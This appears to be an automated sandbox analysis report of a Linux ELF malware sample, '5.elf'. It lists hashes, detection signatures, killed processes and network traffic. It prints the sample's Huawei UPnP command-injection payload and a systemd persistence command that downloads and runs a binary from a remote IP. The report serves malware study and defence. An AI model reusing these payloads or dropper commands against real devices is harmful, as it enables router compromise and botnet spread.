Linux Analysis Report
5.elf

Overview

General Information

Sample name: 5.elf
Analysis ID: 1588850
MD5: 40d57a51ffba8151bf851940d0ad367e
SHA1: dd2bbf98840d5cfe68e6cdc660c6c25e4de6dbc9
SHA256: c14f6f5a9f774456aef2319034d9e6b57975164e2bdbf9a4bf178737a3e725c3
Tags: elf, user-abuse_ch

Detection

Score: 56
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "wget" command typically used for HTTP/S downloading
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

AV Detection

Source: 5.elf ReversingLabs: Detection: 39%
Source: global traffic TCP traffic: 192.168.2.13:56441 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.13:34549 -> 1.1.1.1:53
Source: /bin/bash (PID: 5465) Wget executable: /usr/bin/wget -> wget http://103.136.41.100/5 -O /tmp/5
Source: /tmp/5.elf (PID: 5423) Socket: 127.0.0.1:23476
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1 (8 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 103.136.41.100 (28 occurrences)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 occurrences)
Source: global traffic HTTP traffic detected:
GET /5 HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 103.136.41.100
Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: 5.42.dr String found in binary or memory: http://%d.%d.%d.%d/%s
Source: 5.elf, 5.42.dr String found in binary or memory: http://%d.%d.%d.%d/2;
Source: 5.elf, 5423.1.00007fa550036000.00007fa55003a000.rw-.sdmp, bash, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp, 5, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp String found in binary or memory: http://1/wget.sh
Source: hello.service.12.dr String found in binary or memory: http://103.136.41.100/5
Source: 5.elf, 5423.1.00007fa550036000.00007fa55003a000.rw-.sdmp, bash, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp, 5, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp String found in binary or memory: http://9/curl.sh
Source: 5.42.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 5.42.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3104, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3161, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3162, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3163, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3164, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3165, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3170, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3182, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 3212, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5427, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5428, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5429, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5430, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5431, result: successful
Source: /tmp/5.elf (PID: 5423) SIGKILL sent: pid: 5432, result: successful
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: %s%d%s<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal56.spre.evad.linELF@0/3@2/0
Source: /tmp/5.elf (PID: 5423) File opened: /proc/5262/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3122/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3117/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3114/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/914/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/917/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3134/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3375/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3132/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3095/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1866/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1745/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1588/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/884/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1982/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/765/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/3246/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/800/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/767/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5423) File opened: /proc/5423/status
Source: /tmp/5.elf (PID: 5423) File opened: /proc/1906/cmdline (opened 5 times)
Source: /tmp/5.elf (PID: 5436) Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"
Source: /tmp/5.elf (PID: 5442) Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"
Source: /usr/lib/systemd/systemd (PID: 5445) Shell command executed: /bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;"
Source: /bin/bash (PID: 5467) Chmod executable: /usr/bin/chmod -> chmod 777 /tmp/5
Source: /bin/bash (PID: 5464) Rm executable: /usr/bin/rm -> rm -rf /tmp/5
Source: /bin/sh (PID: 5438) Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload
Source: /bin/sh (PID: 5444) Systemctl executable: /usr/bin/systemctl -> systemctl start hello.service
Source: /bin/bash (PID: 5465) Wget executable: /usr/bin/wget -> wget http://103.136.41.100/5 -O /tmp/5
Source: /usr/bin/chmod (PID: 5467) File: /tmp/5 (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/bash (PID: 5467) Chmod executable with 777: /usr/bin/chmod -> chmod 777 /tmp/5
Source: /usr/bin/wget (PID: 5465) File written: /tmp/5 (dropped file)

Hooking and other Techniques for Hiding and Protection

Source: /usr/bin/rm (PID: 5464) File: /tmp/5
Source: /bin/bash (PID: 5453) Sleep executable: /usr/bin/sleep -> sleep 10
Source: /tmp/5.elf (PID: 5423) Queries kernel information via 'uname'
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5427) Queries kernel information via 'uname'
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5428) Queries kernel information via 'uname'
Source: /bin/bash (PID: 5445) Queries kernel information via 'uname'
Source: /tmp/5 (PID: 5468) Queries kernel information via 'uname'
Source: 5.elf, 5423.1.00005579a3cef000.00005579a3e40000.rw-.sdmp Binary or memory string: yU!/etc/qemu-binfmt/arm
Source: bash, 5468.1.000055d399102000.000055d399253000.rw-.sdmp, 5, 5468.1.000055d399102000.000055d399253000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: 5.elf, 5423.1.00007ffc8cdb6000.00007ffc8cdd7000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/5.elf
Source: 5.elf, 5423.1.00005579a3cef000.00005579a3e40000.rw-.sdmp, bash, 5468.1.000055d399102000.000055d399253000.rw-.sdmp, 5, 5468.1.000055d399102000.000055d399253000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: 5.elf, 5423.1.00007ffc8cdb6000.00007ffc8cdd7000.rw-.sdmp, bash, 5468.1.00007ffee283f000.00007ffee2860000.rw-.sdmp, 5, 5468.1.00007ffee283f000.00007ffee2860000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: bash, 5468.1.00007ffee283f000.00007ffee2860000.rw-.sdmp, 5, 5468.1.00007ffee283f000.00007ffee2860000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/5.p1PWD=/LANG=en_US.UTF-8INVOCATION_ID=ea6e6a85720a446fbd5c3f439d3be8feSHLVL=1JOURNAL_STREAM=9:62552PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin_=/tmp/5/tmp/5